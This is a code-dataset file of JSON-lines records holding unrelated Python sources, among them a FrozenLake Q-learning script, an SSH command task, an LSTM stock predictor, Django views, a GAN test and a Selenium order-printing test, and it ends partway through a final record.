in returns:\n # returns[(state, action)] = []\n # returns[(state, action)].append(g)\n\n # print(returns)\n # for state_action, g_list in returns.items():\n # state, action = state_action\n # print(state,action)\n # rtable[state, action] += g_list\n # print(rtable)\n # qtable[state, action] = np.mean(rtable[state, action])\n\n # Modified\n returns = {}\n g = 0\n for t in reversed(range(len(sa_seq))):\n state, action, reward = sa_seq[t]\n g = gamma * g + reward\n if str((state, action)) not in returns:\n returns[str((state, action))] = []\n else:\n continue\n returns[str((state, action))].append(g)\n\n for state_action, g_list in returns.items():\n state, action = eval(state_action)\n rtable[state][action] += g_list\n qtable[state, action] = np.mean(rtable[state][action])\n\n\n\n # print(\"Qtable update done\")\n # tl = len(sa_seq)\n # # dupes = find_duplicates(sa_seq)\n # # print(dupes)\n # # print(sa_seq)\n # big_G = 0\n # R = total_rewards\n\n # s_a = sa_seq[-1]\n # s,a = [sa_seq[-1][0]],[sa_seq[-1][1]]\n\n\n # g_seq = {}\n # g_seq[str((s,a))] = [big_G]\n\n # for j in range(tl-1):\n # big_G = gamma*big_G + R\n # idx = (-1)*(j+2)\n # s_a = sa_seq[idx]\n # s,a = [sa_seq[idx][0]],[sa_seq[idx][1]]\n # # print(s,a)\n # R= qtable[s,a]\n # if str((s,a)) not in g_seq.keys():\n # g_seq[str((s,a))] = [big_G]\n # else:\n # g_seq[str((s,a))].insert(0,big_G)\n\n # # g_seq.insert(0,big_G)\n\n # # print(g_seq)\n # for k in g_seq.keys():\n\n # kt = eval(k)\n # # print(kt)\n # testset = (int(kt[0][0]), int(kt[1][0]))\n\n # # print(testset)\n # firstinstval = float(g_seq[k][0])\n # rtable[testset[0]][testset[1]].append(firstinstval)\n\n # toupdateQ = np.average(\n # rtable[testset[0]][testset[1]] \n # )\n # qtable[testset[0]][testset[1]]= toupdateQ\n\n\n\n # print(rtable)\n \n # next_ep = input(\"Next Episode? : \")\n # while next_ep == False:\n # next_ep = input(\"Next Episode? : \")\n\n\n # if episode % 50 == 0:\n # np.save('qtable.npy',qtable)\n # # np.save('ntable.npy',ntable)\n\n # print(epsilon)\n # print(qtable)\n # # print(ntable)\n\n\n epsilon = min_epsilon + (max_epsilon - min_epsilon) * np.exp(-decay_rate * (episode+1))\n print(f\"Win: {win}, Loss: {loss}, Timeout:{timeout}\")\n with open(str(experiment_dir)+'\\\\results.txt', 'a') as g:\n g.write(f\"Episode {episode+1}: Steps: {step}, Reward: {total_rewards} Epsilon: {epsilon}\\n\")\n\n if (episode+1) % save_interval == 0:\n np.save(str(experiment_dir)+f'\\\\qtable{episode}.npy',qtable)\n np.save(str(experiment_dir)+f'\\\\ntable{episode}.npy',ntable)\n\n # print(epsilon)\n # print(qtable)\n # print(ntable)\n\n results_array.append([step,total_rewards])\n rewards.append(total_rewards)\n print('[*] episode {}, total reward {}, average score {}'.format(episode, total_rewards, sum(rewards)/(episode+1)))\n\n# print(qtable)\n# print(ntable)\nnp.save(str(experiment_dir)+'\\\\qtable_final.npy',qtable)\nnp.save(str(experiment_dir)+'\\\\ntable_final.npy',ntable)\nep_step_arr = np.array(results_array)\nprint(ep_step_arr.shape)\nnp.save(str(experiment_dir)+'\\\\results_raw.npy',ep_step_arr)\n# np.save('qtable_final.npy',qtable)\n# np.save('ntable_final.npy',ntable)\n\n# Play the game\n\n# tocontinue = input(\"Proceed with Final Demonstration?\")\n# # Final Demo, Showcase Best Scenario\n# for episode in range(1):\n# statestate = env.reset()\n# state = statestate[0]\n# print('*'*20)\n# print('EPISODE ', episode)\n\n# for step in range(max_steps):\n# env.render()\n# action = np.argmax(qtable[state])\n# new_state, reward, done, truncated, info = env.step(action) \n \n# if done: break\n\nenv.close()","repo_name":"epsilonfunction/me5406_frozenlake","sub_path":"method/markov_huh.py","file_name":"markov_huh.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14230517687","text":"import string\nimport random\n\nclass RandomStringUtils:\n\t@staticmethod\n\tdef random(count):\n\t\tpass\n\n\t@staticmethod\n\tdef randomAscii(count):\n\t\tasscii = string.printable\n\t\ts = ''\n\t\tfor i in range(0, count):\n\t\t\ts = s+random.choice(asscii)\n\t\treturn s\n\n\t@staticmethod\n\tdef randomAlphabetic(count):\n\t\tascii_letters = string.ascii_letters\n\t\ts = ''\n\t\tfor i in range(0, count):\n\t\t\ts = s+random.choice(ascii_letters)\n\t\treturn s\n\n\t@staticmethod\n\tdef randomAlphanumeric(count):\n\t\talphanumeric = string.ascii_letters+string.digits\n\t\ts = ''\n\t\tfor i in range(0, count):\n\t\t\ts += random.choice(alphanumeric)\n\t\treturn s\n\n\t@staticmethod\n\tdef randomNumeric(count):\n\t\tdigits = string.digits\n\t\ts = ''\n\t\tfor i in range(0, count):\n\t\t\ts = s+random.choice(digits)\n\t\treturn s\n","repo_name":"Beescast/Beeslm","sub_path":"beesInterface/utils/randomStringUtils.py","file_name":"randomStringUtils.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70145921362","text":"import logging\n\nfrom core.processor import Processor\nfrom utils.ParamikoUtil import ParamikoUtil\nfrom paramiko.client import SSHClient\n\n\nclass RUN_SSH_COMMANDProcessor(Processor):\n TPL: str = '{\"ssh_client_key\":\"sshclient\", \"cmd\":\"\", \"output_key\":\"\", \"close_after_run\":\"yes|no\"}'\n DESC: str = f''' \n - run ssh via paramiko, save result to output_key of data_chain. \n\n {TPL}\n\n '''\n def process(self):\n\n ssh_client: SSHClient = self.get_data(self.get_param(\"ssh_client_key\"))\n\n if not ssh_client is None:\n cmd = self.expression2str(self.get_param(\"cmd\"))\n output_key = self.get_param(\"output_key\")\n\n output = ParamikoUtil.run_ssh_cmd(ssh_client, cmd)\n self.populate_data(output_key, output)\n\n close_after_run = True if self.get_param(\"close_after_run\") == \"yes\" else False\n\n if close_after_run:\n ParamikoUtil.close_ssh_client(ssh_client)\n else:\n logging.warning('ssh_client is not available, please use CREATE_SSH_CLIENT task to setup.')\n","repo_name":"lorisunjunbin/petp","sub_path":"core/processors/RUN_SSH_COMMANDProcessor.py","file_name":"RUN_SSH_COMMANDProcessor.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"12606911533","text":"\"\"\"\nConfiguration for features of Learner Home\n\"\"\"\nfrom django.conf import settings\n\nfrom edx_toggles.toggles import WaffleFlag\n\nfrom openedx.core.djangoapps.site_configuration import helpers as configuration_helpers\n\n# Namespace for Learner Home MFE waffle flags.\nWAFFLE_FLAG_NAMESPACE = \"learner_home_mfe\"\n\n# .. toggle_name: learner_home_mfe.enabled\n# .. toggle_implementation: WaffleFlag\n# .. toggle_default: False\n# .. toggle_description: Waffle flag to enable to redirect user to learner home mfe\n# .. toggle_use_cases: open_edx\n# .. toggle_creation_date: 2022-10-11\n# .. toggle_tickets: AU-879\nENABLE_LEARNER_HOME_MFE = WaffleFlag(\n f\"{WAFFLE_FLAG_NAMESPACE}.enabled\",\n __name__,\n)\n\n\ndef should_redirect_to_learner_home_mfe(user):\n \"\"\"\n Redirect a percentage of learners to Learner Home for experimentation.\n\n Percentage is based on the LEARNER_HOME_MFE_REDIRECT_PERCENTAGE setting.\n \"\"\"\n\n is_learning_mfe_enabled = configuration_helpers.get_value(\n \"ENABLE_LEARNER_HOME_MFE\", ENABLE_LEARNER_HOME_MFE.is_enabled()\n )\n\n learning_mfe_redirect_percent = configuration_helpers.get_value(\n \"LEARNER_HOME_MFE_REDIRECT_PERCENTAGE\",\n settings.LEARNER_HOME_MFE_REDIRECT_PERCENTAGE,\n )\n\n # Redirect when 1) Learner Home MFE is enabled and 2) a user falls into the\n # target range for experimental rollout.\n if is_learning_mfe_enabled and user.id % 100 < learning_mfe_redirect_percent:\n return True\n\n return False\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/learner_home/waffle.py","file_name":"waffle.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"16214793328","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Import Libraries\n\n\n# In[1]:\n\n\nimport math\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas_datareader as web\nimport datetime as dt\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM\nimport yfinance as yf\n\n\n# In[ ]:\n\n\n# Import Data\n\n\n# In[2]:\n\n\ndf= yf.download('SOLIMAC.BO', start='2012-01-01', end='2020-01-01')\n\ndf\n\n\n# In[ ]:\n\n\n# Train the Data\n\n\n# In[3]:\n\n\nscaler = MinMaxScaler(feature_range=(0,1))\n\nscaled_data = scaler.fit_transform(df ['Close'].values.reshape(-1,1))\n\nprediction_days = 60\n\nx_train = []\ny_train = []\n\nfor x in range (prediction_days, len(scaled_data)):\n x_train.append(scaled_data[x-prediction_days:x, 0])\n y_train.append(scaled_data[x,0])\n \n\n\nx_train, y_train = np.array(x_train), np.array(y_train)\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n\n\n# In[4]:\n\n\n# Build the model\n\n\n# In[5]:\n\n\nmodel = Sequential()\n\nmodel.add(LSTM(units=50, return_sequences=True, input_shape = (x_train.shape[1],1)))\nmodel.add(Dropout(0.2))\nmodel.add(LSTM(units=50, return_sequences=True))\nmodel.add(Dropout(0.2))\nmodel.add(LSTM(units=50))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(units=1)) #Prediction of next day/price\n\nmodel.compile(optimizer='adam', loss ='mean_squared_error')\nmodel.fit(x_train, y_train, epochs=25, batch_size=32)\n\n\n# In[6]:\n\n\ntest_data = yf.download('SOLIMAC.BO', start='2020-01-01', end='2023-09-02')\nactual_prices = test_data['Close'].values\n\ntotal_dataset = pd.concat((df['Close'], test_data['Close']), axis=0)\n\nmodel_inputs = total_dataset[len(total_dataset)-len(test_data)-prediction_days:].values\nmodel_inputs = model_inputs.reshape(-1, 1)\nmodel_inputs = scaler.transform(model_inputs)\n\n\n# In[7]:\n\n\ntest_data.tail(10)\n\n\n# In[8]:\n\n\n# Predictions\n\n\n# In[9]:\n\n\nx_test = []\n\nfor x in range (prediction_days, len(model_inputs)):\n x_test.append(model_inputs[x-prediction_days:x, 0])\n\nx_test = np.array(x_test)\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\n\npredicted_prices = model.predict(x_test)\npredicted_prices = scaler.inverse_transform(predicted_prices)\n\n\n# In[10]:\n\n\n# Plot the prediction\n\n\n# In[11]:\n\n\nplt.plot(actual_prices, color= \"black\", label = f\"Actual {'SOLIMAC.BO'} Price\")\nplt.plot(predicted_prices, color= \"green\", label = f\"Predicted {'SOLIMAC.BO'} Price\")\nplt.title(f\"{'SOLIMAC.BO'} Share Price\")\nplt.xlabel('Time')\nplt.ylabel(f\"{'SOLIMAC.BO'} Share Price\")\nplt.legend()\nplt.show()\n\n\n# In[12]:\n\n\n# Prediction for next day\n\n\n# In[13]:\n\n\nreal_data = [model_inputs[len(model_inputs) + 1 - prediction_days:len(model_inputs+1),0]]\nreal_data = np.array(real_data)\nreal_data = np.reshape(real_data, (real_data.shape[0], real_data.shape[1],1))\n\nprediction = model.predict(real_data)\nprediction = scaler.inverse_transform(prediction)\nprint(f\"Prediction: {prediction}\")\n\n","repo_name":"ChiragKapoor30/Projects","sub_path":"Stock Price Prediction.py","file_name":"Stock Price Prediction.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43194885463","text":"import sys\n\n\ndef commStr(str1, str2):\n resultStr = ''\n i = 0\n while i < len(str1):\n if str1[i] in str2 and str1[i] not in resultStr:\n resultStr += str1[i]\n i += 1\n return resultStr\n\n\ncommStr('loli', 'lali')\n\n\ndef commStr(str1, str2):\n resultStr = ''\n i = 0\n while i < len(str1):\n if str1[i].isalpha() in str2 and str1[i] not in resultStr:\n resultStr = resultStr + str1[i]\n i += 1\n return resultStr\n\n\ndef commStrArr(str1, str2):\n ressltArr = []\n for ch in str1:\n if ch.isalpha() and ch in str2 and ch not in ressltArr:\n ressltArr.append(ch)\n return ''.join(ressltArr)\n\n\nprint(commStr('1l\\t olipfhidfhge', '1lolllllll\\t lllllllllllooooooop'))\n\nprint(commStr('loli', 'luck') == 'l')\nprint(commStr('good day', 'good morning') == 'god')\n\n\ndef commStrSet(str1: str, str2):\n ressltSet = set()\n i = 0\n for ch in str1:\n i += 1\n if ch.isalpha() and ch in str2:\n ressltSet.add(ch)\n print(i)\n return ''.join(ressltSet)\n","repo_name":"denysmarakhovskyi/python-hw-2","sub_path":"Ex4.py","file_name":"Ex4.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25731249369","text":"import pytest\n\nfrom terrarium.model import ModelFactory\n\n\n@pytest.fixture(scope=\"function\")\ndef factory(session):\n return ModelFactory(session)\n\n\n@pytest.fixture(scope=\"module\")\ndef users(session):\n plan = session.Plan.one()\n plans1 = session.Plan.last(10, query=dict(user_id=plan.user_id))\n plans2 = session.Plan.last(10, query=\"user_id != {}\".format(plan.user_id))\n\n plans = plans1 + plans2\n user_ids = {p.user_id for p in plans}\n users = session.User.find(list(user_ids))\n return users\n\n\ndef test_empty_model(factory):\n model = factory.new()\n assert model\n\n\n@pytest.mark.parametrize(\"num\", [1, 11])\ndef test_model_factory_new(session, factory, num):\n \"\"\"Expect factory to pull in exactly the specified number of plans.\"\"\"\n plans = session.Plan.last(num)\n model = factory.new(plans)\n assert len(model.weight_container.plans) == num\n\n\ndef test_model_factory_emulate_single_user(factory, config, session):\n \"\"\"Expect emulate to pull in specified number of plans, all belonging to\n the single user.\"\"\"\n login = config[\"login\"]\n user = session.User.one(query=dict(login=login))\n assert len(session.Plan.last(10, query=dict(user_id=user.id))) == 10\n model = factory.emulate(login=login, limit=10)\n assert len(model.weight_container.plans) == 10\n for p in model.weight_container.plans:\n assert p.user_id == user.id\n\n\ndef test_model_attributes(session, factory):\n \"\"\"Models should have a 'version', 'name', 'updated'.\"\"\"\n\n model = factory.new(session.Plan.last(1))\n assert hasattr(model, \"version\")\n assert hasattr(model, \"name\")\n assert hasattr(model, \"created_at\")\n assert hasattr(model, \"updated_at\")\n\n\n@pytest.mark.parametrize(\"num\", [1, 10])\ndef test_build(session, factory, num):\n \"\"\"Build a small, new model.\"\"\"\n model = factory.new(session.Plan.last(num))\n model.print_info()\n model.build()\n\n\ndef test_basic_search(autoplan_model, session):\n autoplan_model.log.set_verbose(True)\n\n ignore_ots = session.OperationType.where(\n {\"category\": \"Control Blocks\", \"deployed\": True}\n )\n ignore = [ot.id for ot in ignore_ots]\n\n autoplan_model.add_model_filter(\n \"AllowableFieldType\", \"exclude\", lambda m: m.field_type.parent_id in ignore\n )\n\n autoplan_model.search_graph(\n session.Sample.one(),\n session.ObjectType.find_by_name(\"Yeast Glycerol Stock\"),\n session.ObjectType.find_by_name(\"Fragment Stock\"),\n )\n\n\ndef test_model_saves_and_load(factory, tmpdir, session):\n model = factory.new(session.Plan.last(10))\n model.build()\n path = tmpdir.mkdir(\"models\").join(\"test_model.pkl\")\n model.save(path)\n\n loaded = factory.load_model(path)\n assert len(loaded.weight_container._edge_counter.counter) > 0\n assert len(loaded.weight_container._node_counter.counter) > 0\n\n\ndef test_model_add(factory, users):\n models = [factory.emulate(u.login, limit=10) for u in users[:3]]\n for m in models:\n m.print_info()\n m.build()\n new_model = factory.new()\n for m in models:\n new_model += m\n\n for k, v in new_model.weight_container._edge_counter.counter.items():\n summed = 0\n for m in models:\n summed += m.weight_container._edge_counter.counter[k]\n assert v == summed\n\n for k, v in new_model.weight_container._node_counter.counter.items():\n summed = 0\n for m in models:\n summed += m.weight_container._node_counter.counter[k]\n assert v == summed\n\n assert new_model\n\n\ndef test_model_mul(factory, users):\n models = [factory.emulate(u.login, limit=10) for u in users[:1]]\n m = models[0]\n m.build()\n new_model = m * 3\n\n\ndef test_model_compose_complex(factory, users):\n models = [factory.emulate(u.login, limit=10) for u in users[:4]]\n for m in models:\n m.print_info()\n m.build()\n\n m1 = models[0]\n m2 = models[1]\n m3 = models[3]\n\n m4 = m1 + m2 * 3 + m3\n","repo_name":"jvrana/Terrarium","sub_path":"tests/live_tests/test_model/test_model_factory.py","file_name":"test_model_factory.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"5191719471","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nsys.path.append('/content/drive/My Drive/drive/gan/gan_git-02/gan_git/compare_gan/')\nsys.path.append('/content/drive/My Drive/drive/gan/gan_git-02/gan_git/')\nprint(sys.path)\nimport os\nfrom absl import flags\nfrom absl.testing import parameterized\nfrom compare_gan import datasets\nfrom compare_gan import test_utils\nfrom compare_gan.gans import consts as c\nfrom compare_gan.gans import loss_lib\nfrom compare_gan.gans.s3gan import S3GAN\nimport gin\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\nFLAGS = flags.FLAGS\nSTEPS_PER_EPOCH = 50\nNUM_EPOCHS = 100\n\nclass S3GANTest(parameterized.TestCase, test_utils.CompareGanTestCase):\n# @parameterized.parameters(\n# {\"use_predictor\": False, \"self_supervision\": \"rotation\"}, # only SS.\n# {\"use_predictor\": False, \"project_y\": False}, # unsupervised.\n# {\"use_predictor\": False}, # fully supervised.\n# {\"use_predictor\": True}, # only oracle.\n# {\"use_predictor\": True, \"self_supervision\": \"rotation\"}, # oracle + SS.\n#\n# )\n def testSingleTrainingStepArchitectures(\n self, use_predictor = True, project_y=True, self_supervision=\"rotation\"):\n print(\"-----------------------testSingleTrainingStepArchitectures,s\")\n parameters = {\n \"architecture\": c.RESNET_BIGGAN_ARCH,\n \"lambda\": 1,\n \"z_dim\": 120,\n }\n with gin.unlock_config():\n gin.bind_parameter(\"ModularGAN.conditional\", True)\n gin.bind_parameter(\"loss.fn\", loss_lib.hinge)\n gin.bind_parameter(\"S3GAN.use_predictor\", use_predictor)\n gin.bind_parameter(\"S3GAN.project_y\", project_y)\n gin.bind_parameter(\"S3GAN.self_supervision\", self_supervision)\n \n # Fake ImageNet dataset by overriding the properties.\n dataset = datasets.get_dataset(\"RotorWinding_128\")\n \n model_dir = self._get_empty_model_dir()\n# run_config = tf.contrib.tpu.RunConfig(\n# model_dir=model_dir,\n# tpu_config=tf.contrib.tpu.TPUConfig(iterations_per_loop=1))\n session_config = tf.compat.v1.ConfigProto(allow_soft_placement=True)\n session_config.gpu_options.per_process_gpu_memory_fraction = 0.9\n run_config = tf.estimator.RunConfig(model_dir=model_dir, save_checkpoints_steps=50, keep_checkpoint_max = 1 ).replace(session_config=session_config)\n\n gan = S3GAN(\n dataset=dataset,\n parameters=parameters,\n model_dir=model_dir,\n g_optimizer_fn=tf.compat.v1.train.AdamOptimizer,\n g_lr=0.0002,\n rotated_batch_fraction=2)\n\n print(\"-----------------------tf.estimator.TrainSpec\")\n train_spec = tf.estimator.TrainSpec(input_fn=gan.input_fn,max_steps=STEPS_PER_EPOCH * NUM_EPOCHS)\n print(\"-----------------------tf.estimator.EvalSpec\")\n eval_spec = tf.estimator.EvalSpec(input_fn=gan.eval_input_fn, steps = 20, throttle_secs = 1)\n print(\"-----------------------gan.as_estimator\")\n estimator = gan.as_estimator(run_config=run_config, model_dir=model_dir, batch_size=8, use_tpu=False)\n #estimator.train(gan.input_fn, steps=1)\n print(\"-----------------------tf.estimator.train_and_evaluate\")\n tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)\n print(\"-----------------------testSingleTrainingStepArchitectures,e\")\n \n############################################################----save hub module----##############################################\n module_spec = gan.as_gen_hub_module_spec()\n export_path = os.path.join(model_dir, \"gene_hub\")\n checkpoint_path = os.path.join(model_dir,\"model.ckpt-\" + str(STEPS_PER_EPOCH * NUM_EPOCHS))\n if not tf.io.gfile.exists(export_path):\n module_spec.export(export_path, checkpoint_path=checkpoint_path)\n \n\n \n \nif __name__ == \"__main__\":\n tf.test.main()","repo_name":"youbin-jia/jyb_paper","sub_path":"gan_git-02/gan_git/compare_gan/gans/s3gan_test.py","file_name":"s3gan_test.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21330202242","text":"from flask import current_app, jsonify\n\nfrom app import errors\nfrom app.exam.exam_config import ReportConfig\nfrom app.models.exam import CurrentTestModel, HistoryTestModel\n\n\n# 先从 current 中找,current 不存在到 history 中找\ndef get_exam_by_id(test_id):\n test = CurrentTestModel.objects(id=test_id).first()\n if test is None:\n test = HistoryTestModel.objects(current_id=test_id).first()\n return test\n\n\n# 筛选出 score 和 feature 中的有用数据\ndef get_score_and_feature(question_list):\n score = {} # {1:{'quality': 80}, 2:{'key':100,'detail':xx}, ...}\n feature = {}\n handling = False # 是否还在处理中\n\n # 遍历 test 对应的 questions,将需要的 score 和 feature 抽取出来,用于后续分析\n for i in range(len(question_list), 0, -1):\n if question_list[str(i)]['status'] == 'finished':\n score[i] = question_list[str(i)]['score']\n feature[i] = feature_filter(question_list[str(i)]['feature'], question_list[str(i)]['q_type'])\n else:\n score[i] = {\"quality\": 0, \"key\": 0, \"detail\": 0, \"structure\": 0, \"logic\": 0}\n feature[i] = {}\n if question_list[str(i)]['status'] == 'handling':\n handling = True\n\n return handling, score, feature\n\n\n# 提取生成报告时会用到的 feature\n# 2、5、6、7 等转述题不需要提取 feature,根据分数生成报告\ndef feature_filter(feature_dict, q_type):\n ret = {}\n if q_type == 1:\n ret['clr_ratio'] = feature_dict['clr_ratio']\n ret['ftl_ratio'] = feature_dict['ftl_ratio']\n ret['interval_num'] = feature_dict['interval_num']\n ret['speed'] = feature_dict['speed']\n elif q_type == 3:\n ret['structure_hit'], ret['structure_not_hit'] = [], []\n ret['logic_hit'], ret['logic_not_hit'] = [], []\n for item in ReportConfig.structure_list:\n if feature_dict[item + '_num'] > 0:\n ret['structure_hit'].append(item)\n else:\n ret['structure_not_hit'].append(item)\n for item in ReportConfig.logic_list:\n if feature_dict[item + '_num'] > 0:\n ret['logic_hit'].append(item)\n else:\n ret['logic_not_hit'].append(item)\n\n return ret\n","repo_name":"llf-970310/expression-flask","sub_path":"app/exam/manager/exam.py","file_name":"exam.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73410218962","text":"from typing import Union\n\nfrom models import db, Player\nfrom schemas import player_schema\nfrom marshmallow import ValidationError\n\n\nclass PlayerService:\n @staticmethod\n def create_player(fields: dict) -> Union[dict, tuple]:\n if not fields:\n return {\"message\": \"No input data provided\"}, 400\n try:\n player_data = player_schema.load(fields, session=db.session)\n except ValidationError as err:\n return err.messages, 422\n db.session.add(player_data)\n db.session.commit()\n return player_schema.dump(player_data)\n\n @staticmethod\n def get_player_by_id(player_id: int) -> dict:\n player = db.get_or_404(Player, player_id, description='Player with specified id was not found')\n return player_schema.dump(player)\n\n @classmethod\n def delete_player_by_id(cls, player_id: int) -> int:\n player = db.get_or_404(Player, player_id, description='Player with specified id was not found')\n db.session.delete(player)\n db.session.commit()\n return player_id\n\n @staticmethod\n def get_all_players() -> dict:\n quotes = Player.query.all()\n result = player_schema.dump(quotes, many=True)\n return result","repo_name":"ligain/tic_tac_toe","sub_path":"app/services/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23790115854","text":"#-*- coding: utf-8 -*-\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\nfrom django.shortcuts import get_object_or_404,render\nfrom django.core.urlresolvers import reverse\n# Create your views here.\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom dosirak.models import Question,Reply\nfrom django.template import RequestContext, loader\nfrom django.utils import timezone\n\ndef index(request):\n question_list=Question.objects.order_by('-pub_date')[:]\n #template = loader.get_template('dosirak/index.html')\n #context = RequestContext(request, {\n # 'question_list': question_list,\n #})\n context={'question_list':question_list}\n #return HttpResponse(output+template.render(context))\n return render(request, 'dosirak/index.html', context)\n\ndef detail(request, question_id):\n question=get_object_or_404(Question,pk=question_id)\n reply_list=Reply.objects.order_by('question')[:]\n return render(request, 'dosirak/detail.html', {'question':question,'reply_list':reply_list})\n\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'dosirak/taken.html', {'question': question})\n\ndef again(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'dosirak/error.html', {'question': question})\n\ndef vote(request, question_id):\n p = get_object_or_404(Question, pk=question_id)\n taste=request.POST.get('taste')\n service=request.POST.get('service')\n price=request.POST.get('price')\n air=request.POST.get('air')\n cleanness=request.POST.get('cleanness')\n replier=request.POST.get('replier')\n review=request.POST.get('review')\n star_set=[taste,service,price,air,cleanness]\n if star_set.__contains__('0') or (replier is None or review is None):\n return HttpResponseRedirect(reverse('again', args=(p.id,)))\n else:\n add_reply=Reply(question=p,name=replier,count_taste=taste,count_price=price,count_service=service,count_air=air,count_cleanness=cleanness,reple=review,rep_date=timezone.now())\n add_reply.save()\n add_reply.update_Question()\n return HttpResponseRedirect(reverse('results', args=(p.id,)))","repo_name":"drexly/tonginGAE","sub_path":"dosirak/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10894024515","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*- \n#Author: rufeng\n\nimport unittest\nimport time\nfrom framework.browser_engine import BrowserEngine\nfrom framework.logger import Logger\nfrom pageobjects.login_page import Loginpage\nfrom pageobjects.order_create_page import Ordercreate\nfrom pageobjects.order_page import OrderPage\n\nclass Printsend(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"\n 测试固件的setUp()的代码,主要是测试的前提准备工作\n :return:\n \"\"\"\n browser = BrowserEngine(cls)\n cls.driver = browser.open_browser(cls)\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"\n 测试结束后的操作,这里基本上都是关闭浏览器\n :return:\n \"\"\"\n cls.driver.quit()\n\n\n\n\n\n def test_print_and_send(self):\n\n # 参数 ----------------------------------\n address = '张放1'\n tem = '顺丰热敏180mm'\n # ----------------------------------------------\n logger = Logger(logger=\"BasePage\").getlog()\n #初始化登录界面,并登录\n loginpage = Loginpage(self.driver)\n loginpage.type_username('12830222909')\n loginpage.type_password('1qaz2wsx')\n self.driver.find_element_by_id('submit').click()\n\n time.sleep(3)\n # 定义一个指定的订单\n\n # 切换到当前frame\n frame1 = self.driver.find_element_by_id('container-i')\n self.driver.switch_to_frame(frame1)\n time.sleep(3)\n\n # 页面实例化\n orderpage = OrderPage(self.driver)\n\n # 根据指定的收件地址选择订单\n self.driver.find_element_by_xpath('//td[text()=\"%s\"]'%address).click()\n # 点击打印快递单\n orderpage.click_print()\n time.sleep(1)\n # 选择模板\n self.driver.find_element_by_xpath('//label[text()=\"%s\"]'%tem).click()\n # 选择打印机\n orderpage.choose_printer('Microsoft XPS Document Writer')\n # 点击打印\n orderpage.click_print1()\n time.sleep(1)\n # 确定打印\n orderpage.yes_print()\n time.sleep(4)\n # 验证打印结果--------------------------------------------------------------------------------------------------\n row1 = orderpage.element_row('张放1')\n x = '//*[@id=\"tableDiv\"]/table/tbody[2]/tr[%s]/td[1]/i'%row1 # 打印标志\n try:\n if orderpage.is_element_exist(x):\n self.assertTrue(True)\n logger.info('打印成功')\n else:\n self.assertTrue(False)\n except BaseException as e:\n self.assertTrue(False)\n # --------------------------------------------------------------------------------------------------------------\n orderpage.click_consignBtn()\n time.sleep(3)\n # 验证发货合计信息是否正确--------------------------------------------------------------------------------------\n info1 = orderpage.get_consignment_info()\n print(info1)\n try:\n if info1 == '发货合计:共1单':\n self.assertTrue(True)\n logger.info('选择一条订单进行发货')\n else:\n orderpage.get_windows_img()\n self.assertTrue(False)\n except BaseException as e:\n self.assertTrue(False)\n time.sleep(2)\n # 点击确定\n orderpage.click_qdConsign()\n time.sleep(4)\n # 验证发货结果\n info2 = orderpage.get_consignResult_info()\n try:\n if info2 == '共1单,成功1单,失败0单':\n self.assertTrue(True)\n logger.info('一条订单发货成功')\n else:\n orderpage.get_windows_img()\n self.assertTrue(False)\n except BaseException as e:\n self.assertTrue(False)\n\n # 关闭发货弹框\n orderpage.click_confirm_close()\n time.sleep(2)\n # 跳出frame\n self.driver.switch_to.default_content()\n # 退出登录\n loginpage.skin01_logout()\n time.sleep(3)\n\nif __name__=='__main__':\n unittest.main()\n","repo_name":"Rufengfree/ECS","sub_path":"testsuits/printandsend.py","file_name":"printandsend.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10894495188","text":"from pathlib import Path\nfrom typing import Any, Literal\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nfrom matplotlib import cm\nfrom pytorch_lightning.callbacks import Callback\nfrom transformers import PreTrainedTokenizer\n\nfrom memory_re.data.datasets.entities import EntityType, RelationType, TokenizedDocument\nfrom memory_re.utils.logger 